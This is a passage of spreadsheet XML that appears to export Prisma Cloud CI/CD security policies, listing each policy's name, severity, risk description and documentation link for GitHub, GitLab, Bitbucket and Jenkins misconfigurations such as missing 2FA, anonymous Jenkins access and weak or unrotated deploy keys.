          <t>All members of an organization have privileges to create internal repositories. If a member's account or access token is compromised, a malicious actor could create such a repository and access all of the organization's secrets scoped to private and internal repositories. For example, if the scope of a GitHub organization secret is not limited to specific repositories, any member of the organization can create an internal repository and configure a GitHub Actions workflow to retrieve the secret. In addition, internal repositories are accessible to any member in the enterprise, which could potentially allow unauthorized access to these repositories.</t>
        </is>
      </c>
      <c r="X1017" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/github-cicd-pipeline-policies/gh-any-member-create-internal-repos</t>
        </is>
      </c>
      <c r="Y1017" t="inlineStr"/>
      <c r="Z1017" t="inlineStr">
        <is>
          <t>{"category":"IAM","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA1017" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1017" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1017" t="inlineStr"/>
      <c r="AD1017" t="b">
        <v>1</v>
      </c>
      <c r="AE1017" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1017" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG10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7" t="inlineStr">
        <is>
          <t>9d83177d-10cf-497d-8273-f182b85306bd</t>
        </is>
      </c>
      <c r="AI1017" t="inlineStr"/>
      <c r="AJ1017" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1017" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1018">
      <c r="A1018" t="inlineStr"/>
      <c r="B1018" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1018" s="2" t="inlineStr"/>
      <c r="D1018" t="inlineStr"/>
      <c r="E1018" t="inlineStr"/>
      <c r="F1018" t="inlineStr"/>
      <c r="G1018" t="b">
        <v>1</v>
      </c>
      <c r="H10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8" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1018" t="inlineStr">
        <is>
          <t>IaC:IAM:</t>
        </is>
      </c>
      <c r="K1018" t="inlineStr">
        <is>
          <t>Excessive user permissions to a BitBucket repository</t>
        </is>
      </c>
      <c r="L1018" t="inlineStr"/>
      <c r="M1018" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1018" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1018" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1018" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1018" t="inlineStr"/>
      <c r="R1018" t="inlineStr"/>
      <c r="S1018" t="inlineStr"/>
      <c r="T1018" t="b">
        <v>0</v>
      </c>
      <c r="U1018" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1018" t="inlineStr">
        <is>
          <t>IaC:IAM:</t>
        </is>
      </c>
      <c r="W1018" t="inlineStr">
        <is>
          <t>A user with 'write' permissions to a repository who has not performed any actions requiring write permissions for more than 90 days, may not require these permissions. This poses a threat, as attackers who gain control of a user account can access the repository which the user potentially should not have 'write' permissions to (as they are not active in the repository), thereby enlarging the surface of the attack.</t>
        </is>
      </c>
      <c r="X1018" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/bitbucket-cicd-pipeline-policies/bb-excessive-app-permissions</t>
        </is>
      </c>
      <c r="Y1018" t="inlineStr"/>
      <c r="Z1018" t="inlineStr">
        <is>
          <t>{"category":"IAM","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA1018" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1018" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1018" t="inlineStr"/>
      <c r="AD1018" t="b">
        <v>1</v>
      </c>
      <c r="AE1018" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1018" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG10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8" t="inlineStr">
        <is>
          <t>b831da2a-2b7f-40a8-8c9f-4c05e9fa54df</t>
        </is>
      </c>
      <c r="AI1018" t="inlineStr"/>
      <c r="AJ1018" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1018" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1019">
      <c r="A1019" t="inlineStr"/>
      <c r="B1019" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1019" s="2" t="inlineStr"/>
      <c r="D1019" t="inlineStr"/>
      <c r="E1019" t="inlineStr"/>
      <c r="F1019" t="inlineStr"/>
      <c r="G1019" t="b">
        <v>1</v>
      </c>
      <c r="H10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19" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1019" t="inlineStr">
        <is>
          <t>IaC:IAM:</t>
        </is>
      </c>
      <c r="K1019" t="inlineStr">
        <is>
          <t>GitHub deploy key has a weak SSH signature</t>
        </is>
      </c>
      <c r="L1019" t="inlineStr"/>
      <c r="M1019" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1019" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1019" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1019" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1019" t="inlineStr"/>
      <c r="R1019" t="inlineStr"/>
      <c r="S1019" t="inlineStr"/>
      <c r="T1019" t="b">
        <v>0</v>
      </c>
      <c r="U1019" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1019" t="inlineStr">
        <is>
          <t>IaC:IAM:</t>
        </is>
      </c>
      <c r="W1019" t="inlineStr">
        <is>
          <t>Repository deploy keys created with weak signature algorithms can allow attackers to perform a Man In The Middle attack and compromise the integrity and confidentiality of the communications with the SCM. A deploy key created with the deprecated ssh-dss algorithm is in use in the GitHub organization. The algorithm was deprecated in OpenSSH 7.0: http://www.openssh.com/legacy.html</t>
        </is>
      </c>
      <c r="X1019" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/github-cicd-pipeline-policies/gh-deploykey-weak-ssh</t>
        </is>
      </c>
      <c r="Y1019" t="inlineStr"/>
      <c r="Z1019" t="inlineStr">
        <is>
          <t>{"category":"IAM","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA1019" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1019" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1019" t="inlineStr"/>
      <c r="AD1019" t="b">
        <v>1</v>
      </c>
      <c r="AE1019" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1019" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG10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19" t="inlineStr">
        <is>
          <t>72410992-631e-4a37-a229-7626310c1049</t>
        </is>
      </c>
      <c r="AI1019" t="inlineStr"/>
      <c r="AJ1019" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1019" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1020">
      <c r="A1020" t="inlineStr"/>
      <c r="B1020" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1020" s="2" t="inlineStr"/>
      <c r="D1020" t="inlineStr"/>
      <c r="E1020" t="inlineStr"/>
      <c r="F1020" t="inlineStr"/>
      <c r="G1020" t="b">
        <v>1</v>
      </c>
      <c r="H10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0" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1020" t="inlineStr">
        <is>
          <t>IaC:IAM:</t>
        </is>
      </c>
      <c r="K1020" t="inlineStr">
        <is>
          <t>Outside collaborators have admin access to a GitHub repository</t>
        </is>
      </c>
      <c r="L1020" t="inlineStr"/>
      <c r="M1020" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1020" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1020" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1020" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1020" t="inlineStr"/>
      <c r="R1020" t="inlineStr"/>
      <c r="S1020" t="inlineStr"/>
      <c r="T1020" t="b">
        <v>0</v>
      </c>
      <c r="U1020" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1020" t="inlineStr">
        <is>
          <t>IaC:IAM:</t>
        </is>
      </c>
      <c r="W1020" t="inlineStr">
        <is>
          <t>Outside collaborators are not explicit members of the GitHub organization, and are usually used to allow contributors from outside the company (as contractors) to collaborate on specific repositories. In contrast to organization members, where the security of their accounts is the responsibility of the organization (such as mailbox protection, phishing and security awareness), the security level of outside collaborators are outside of the organization's jurisdiction. Therefore, outside collaborators should carefully be granted access to the organization and its repositories, in order to limit the potential damage in case of compromise of their account. Outside collaborators granted admin access to repositories induce high risk to the organization, as they are able to administer the repository and commit malicious code while circumventing security measures.</t>
        </is>
      </c>
      <c r="X1020" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/github-cicd-pipeline-policies/gh-outside-collab-access-repo</t>
        </is>
      </c>
      <c r="Y1020" t="inlineStr"/>
      <c r="Z1020" t="inlineStr">
        <is>
          <t>{"category":"IAM","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA1020" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1020" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1020" t="inlineStr"/>
      <c r="AD1020" t="b">
        <v>1</v>
      </c>
      <c r="AE1020" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1020" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG10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0" t="inlineStr">
        <is>
          <t>d427c026-1ffe-4993-8286-2b93092fdca7</t>
        </is>
      </c>
      <c r="AI1020" t="inlineStr"/>
      <c r="AJ1020" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1020" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1021">
      <c r="A1021" t="inlineStr"/>
      <c r="B1021" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1021" s="2" t="inlineStr"/>
      <c r="D1021" t="inlineStr"/>
      <c r="E1021" t="inlineStr"/>
      <c r="F1021" t="inlineStr"/>
      <c r="G1021" t="b">
        <v>1</v>
      </c>
      <c r="H10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1" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1021" t="inlineStr">
        <is>
          <t>IaC:IAM:</t>
        </is>
      </c>
      <c r="K1021" t="inlineStr">
        <is>
          <t>GitHub User account is missing 2FA</t>
        </is>
      </c>
      <c r="L1021" t="inlineStr"/>
      <c r="M1021" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1021" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1021" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1021" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1021" t="inlineStr"/>
      <c r="R1021" t="inlineStr"/>
      <c r="S1021" t="inlineStr"/>
      <c r="T1021" t="b">
        <v>0</v>
      </c>
      <c r="U1021" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1021" t="inlineStr">
        <is>
          <t>IaC:IAM:</t>
        </is>
      </c>
      <c r="W1021" t="inlineStr">
        <is>
          <t>The user account does not have 2FA configured. In case the user&amp;#39;s credentials to the system are compromised, an adversary will not be able to use the credentials without the second factor.</t>
        </is>
      </c>
      <c r="X1021" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/github-cicd-pipeline-policies/gh-acc-miss-2fa</t>
        </is>
      </c>
      <c r="Y1021" t="inlineStr"/>
      <c r="Z1021" t="inlineStr">
        <is>
          <t>{"category":"IAM","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA1021" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1021" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1021" t="inlineStr"/>
      <c r="AD1021" t="b">
        <v>1</v>
      </c>
      <c r="AE1021" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1021" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG10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1" t="inlineStr">
        <is>
          <t>a66db3a7-f8bc-4d74-9701-894a313d28b5</t>
        </is>
      </c>
      <c r="AI1021" t="inlineStr"/>
      <c r="AJ1021" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1021" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1022">
      <c r="A1022" t="inlineStr"/>
      <c r="B1022" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1022" s="2" t="inlineStr"/>
      <c r="D1022" t="inlineStr"/>
      <c r="E1022" t="inlineStr"/>
      <c r="F1022" t="inlineStr"/>
      <c r="G1022" t="b">
        <v>1</v>
      </c>
      <c r="H10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2" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1022" t="inlineStr">
        <is>
          <t>IaC:IAM:</t>
        </is>
      </c>
      <c r="K1022" t="inlineStr">
        <is>
          <t>Jenkins provides read access to anonymous visitors</t>
        </is>
      </c>
      <c r="L1022" t="inlineStr"/>
      <c r="M1022" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1022" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1022" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1022" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1022" t="inlineStr"/>
      <c r="R1022" t="inlineStr"/>
      <c r="S1022" t="inlineStr"/>
      <c r="T1022" t="b">
        <v>0</v>
      </c>
      <c r="U1022" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1022" t="inlineStr">
        <is>
          <t>IaC:IAM:</t>
        </is>
      </c>
      <c r="W1022" t="inlineStr">
        <is>
          <t>Anonymous visitors with network access to the Jenkins instance has read access to it without being required to authenticate, allowing anonymous attackers to expose information on the instance, such as: • Console outputs of executed jobs. • Job names. • Credentials IDs. • Registered users. • Available nodes.</t>
        </is>
      </c>
      <c r="X1022" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/jenkins-cicd-pipeline-policies/jenkins-readaccess-anon-visitors</t>
        </is>
      </c>
      <c r="Y1022" t="inlineStr"/>
      <c r="Z1022" t="inlineStr">
        <is>
          <t>{"category":"IAM","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA1022" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1022" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1022" t="inlineStr"/>
      <c r="AD1022" t="b">
        <v>1</v>
      </c>
      <c r="AE1022" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1022" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG10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2" t="inlineStr">
        <is>
          <t>71d1176b-4782-4b1e-8403-10eaa787630c</t>
        </is>
      </c>
      <c r="AI1022" t="inlineStr"/>
      <c r="AJ1022" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1022" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1023">
      <c r="A1023" t="inlineStr"/>
      <c r="B1023" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1023" s="2" t="inlineStr"/>
      <c r="D1023" t="inlineStr"/>
      <c r="E1023" t="inlineStr"/>
      <c r="F1023" t="inlineStr"/>
      <c r="G1023" t="b">
        <v>1</v>
      </c>
      <c r="H10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3" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1023" t="inlineStr">
        <is>
          <t>IaC:IAM:</t>
        </is>
      </c>
      <c r="K1023" t="inlineStr">
        <is>
          <t>Any organization member In GitHub can create private repositories</t>
        </is>
      </c>
      <c r="L1023" t="inlineStr"/>
      <c r="M1023" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1023" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1023" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1023" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1023" t="inlineStr"/>
      <c r="R1023" t="inlineStr"/>
      <c r="S1023" t="inlineStr"/>
      <c r="T1023" t="b">
        <v>0</v>
      </c>
      <c r="U1023" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1023" t="inlineStr">
        <is>
          <t>IaC:IAM:</t>
        </is>
      </c>
      <c r="W1023" t="inlineStr">
        <is>
          <t>All members of an organization have privileges to create private repositories. If a member's account or access token is compromised, a malicious actor could create such a repository and access all of the organization's secrets scoped to private and internal repositories. For example, if the scope of a GitHub organization secret is not limited to specific repositories, any member of the organization can create an private repository and configure a GitHub Actions workflow to retrieve the secret.</t>
        </is>
      </c>
      <c r="X1023" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/github-cicd-pipeline-policies/gh-any-member-create-private-repos</t>
        </is>
      </c>
      <c r="Y1023" t="inlineStr"/>
      <c r="Z1023" t="inlineStr">
        <is>
          <t>{"category":"IAM","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA1023" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1023" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1023" t="inlineStr"/>
      <c r="AD1023" t="b">
        <v>1</v>
      </c>
      <c r="AE1023" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1023" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG10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3" t="inlineStr">
        <is>
          <t>c73f1cbe-0a4c-4d4c-99e8-18dce2874a0e</t>
        </is>
      </c>
      <c r="AI1023" t="inlineStr"/>
      <c r="AJ1023" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1023" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1024">
      <c r="A1024" t="inlineStr"/>
      <c r="B1024" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1024" s="2" t="inlineStr"/>
      <c r="D1024" t="inlineStr"/>
      <c r="E1024" t="inlineStr"/>
      <c r="F1024" t="inlineStr"/>
      <c r="G1024" t="b">
        <v>1</v>
      </c>
      <c r="H10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4" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1024" t="inlineStr">
        <is>
          <t>IaC:IAM:</t>
        </is>
      </c>
      <c r="K1024" t="inlineStr">
        <is>
          <t>Unrotated GitLab deploy keys</t>
        </is>
      </c>
      <c r="L1024" t="inlineStr"/>
      <c r="M1024" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1024" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1024" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1024" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1024" t="inlineStr"/>
      <c r="R1024" t="inlineStr"/>
      <c r="S1024" t="inlineStr"/>
      <c r="T1024" t="b">
        <v>0</v>
      </c>
      <c r="U1024" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1024" t="inlineStr">
        <is>
          <t>IaC:IAM:</t>
        </is>
      </c>
      <c r="W1024" t="inlineStr">
        <is>
          <t>Deploy keys created on GitLab projects were not rotated for more than 180 days. An attacker that obtains access to a deploy key has direct access to the repository code, and in cases where the key is assigned with write permissions, it grants the ability to edit it. As long as a deploy key exists, it increases the potential of a leaked key to be valid when used by an attacker.</t>
        </is>
      </c>
      <c r="X1024" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/gitlab-cicd-pipeline-policies/gl-unrotated-dep-key</t>
        </is>
      </c>
      <c r="Y1024" t="inlineStr"/>
      <c r="Z1024" t="inlineStr">
        <is>
          <t>{"category":"IAM","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA1024" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1024" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1024" t="inlineStr"/>
      <c r="AD1024" t="b">
        <v>1</v>
      </c>
      <c r="AE1024" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1024" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG10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4" t="inlineStr">
        <is>
          <t>0c472248-1cb2-4338-ab7d-213653326577</t>
        </is>
      </c>
      <c r="AI1024" t="inlineStr"/>
      <c r="AJ1024" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1024" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1025">
      <c r="A1025" t="inlineStr"/>
      <c r="B1025" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1025" s="2" t="inlineStr"/>
      <c r="D1025" t="inlineStr"/>
      <c r="E1025" t="inlineStr"/>
      <c r="F1025" t="inlineStr"/>
      <c r="G1025" t="b">
        <v>1</v>
      </c>
      <c r="H10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5" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1025" t="inlineStr">
        <is>
          <t>IaC:IAM:</t>
        </is>
      </c>
      <c r="K1025" t="inlineStr">
        <is>
          <t>Excessive user permissions to a GitHub repository</t>
        </is>
      </c>
      <c r="L1025" t="inlineStr"/>
      <c r="M1025" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1025" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1025" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1025" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1025" t="inlineStr"/>
      <c r="R1025" t="inlineStr"/>
      <c r="S1025" t="inlineStr"/>
      <c r="T1025" t="b">
        <v>0</v>
      </c>
      <c r="U1025" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1025" t="inlineStr">
        <is>
          <t>IaC:IAM:</t>
        </is>
      </c>
      <c r="W1025" t="inlineStr">
        <is>
          <t>A user with 'write' permissions to a repository who has not performed any actions requiring write permissions for more than 90 days, may not require these permissions. This poses a threat, as attackers who gain control of a user account can access the repository which the user potentially should not have 'write' permissions to (as they are not active in the repository), thereby enlarging the surface of the attack.</t>
        </is>
      </c>
      <c r="X1025" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/github-cicd-pipeline-policies/gh-excessive-perm-repo</t>
        </is>
      </c>
      <c r="Y1025" t="inlineStr"/>
      <c r="Z1025" t="inlineStr">
        <is>
          <t>{"category":"IAM","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA1025" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1025" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1025" t="inlineStr"/>
      <c r="AD1025" t="b">
        <v>1</v>
      </c>
      <c r="AE1025" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1025" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG10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5" t="inlineStr">
        <is>
          <t>d0e22947-7011-4f94-82e9-8ae13432ce78</t>
        </is>
      </c>
      <c r="AI1025" t="inlineStr"/>
      <c r="AJ1025" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1025" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1026">
      <c r="A1026" t="inlineStr"/>
      <c r="B1026" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1026" s="2" t="inlineStr"/>
      <c r="D1026" t="inlineStr"/>
      <c r="E1026" t="inlineStr"/>
      <c r="F1026" t="inlineStr"/>
      <c r="G1026" t="b">
        <v>1</v>
      </c>
      <c r="H10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6" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1026" t="inlineStr">
        <is>
          <t>IaC:IAM:</t>
        </is>
      </c>
      <c r="K1026" t="inlineStr">
        <is>
          <t>No authentication is configured in Jenkins</t>
        </is>
      </c>
      <c r="L1026" t="inlineStr"/>
      <c r="M1026" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1026" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1026" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1026" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1026" t="inlineStr"/>
      <c r="R1026" t="inlineStr"/>
      <c r="S1026" t="inlineStr"/>
      <c r="T1026" t="b">
        <v>0</v>
      </c>
      <c r="U1026" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1026" t="inlineStr">
        <is>
          <t>IaC:IAM:</t>
        </is>
      </c>
      <c r="W1026" t="inlineStr">
        <is>
          <t>No authentication method is configured for the Jenkins instance. Anyone with network access to the instance has full control over it without being required to authenticate, allowing anonymous attackers to edit and execute jobs, modify settings, and administer the system.</t>
        </is>
      </c>
      <c r="X1026" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/jenkins-cicd-pipeline-policies/jenkins-no-auth</t>
        </is>
      </c>
      <c r="Y1026" t="inlineStr"/>
      <c r="Z1026" t="inlineStr">
        <is>
          <t>{"category":"IAM","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA1026" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1026" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1026" t="inlineStr"/>
      <c r="AD1026" t="b">
        <v>1</v>
      </c>
      <c r="AE1026" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1026" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG10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6" t="inlineStr">
        <is>
          <t>b918ee06-e9cb-427a-9ebe-c6164e084fb6</t>
        </is>
      </c>
      <c r="AI1026" t="inlineStr"/>
      <c r="AJ1026" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1026" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1027">
      <c r="A1027" t="inlineStr"/>
      <c r="B1027" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1027" s="2" t="inlineStr"/>
      <c r="D1027" t="inlineStr"/>
      <c r="E1027" t="inlineStr"/>
      <c r="F1027" t="inlineStr"/>
      <c r="G1027" t="b">
        <v>1</v>
      </c>
      <c r="H10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7" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1027" t="inlineStr">
        <is>
          <t>IaC:IAM:</t>
        </is>
      </c>
      <c r="K1027" t="inlineStr">
        <is>
          <t>BitBucket access key has a weak SSH signature</t>
        </is>
      </c>
      <c r="L1027" t="inlineStr"/>
      <c r="M1027" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1027" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
